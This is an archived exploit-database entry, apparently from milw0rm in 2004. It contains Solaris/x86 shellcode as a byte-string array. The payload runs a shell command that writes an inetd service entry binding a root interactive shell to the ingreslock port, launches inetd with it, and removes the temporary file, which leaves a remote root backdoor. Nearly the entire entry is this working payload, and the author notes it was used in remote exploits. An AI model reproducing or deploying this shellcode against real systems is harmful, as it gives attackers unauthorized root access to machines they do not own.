Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)

EDB-ID:

13502

CVE:

N/A




Platform:

Solaris_x86

Date:

2004-09-26


/*
 *  Solaris/x86
 *
 *  Just execve()'s the following:
 *   "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
 *   "/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";
 *
 *  for a trivial remote bd. Used in a few old Solaris/x86 remote exploits. 
 */
 
char c0de[] =
"\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10"
"\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6"
"\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x04\x04\x04\x04"
"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;"
"/usr/sbin/inetd -s /tmp/x; /bin/rm -f /tmp/x";

/* EOF */

# milw0rm.com [2004-09-26]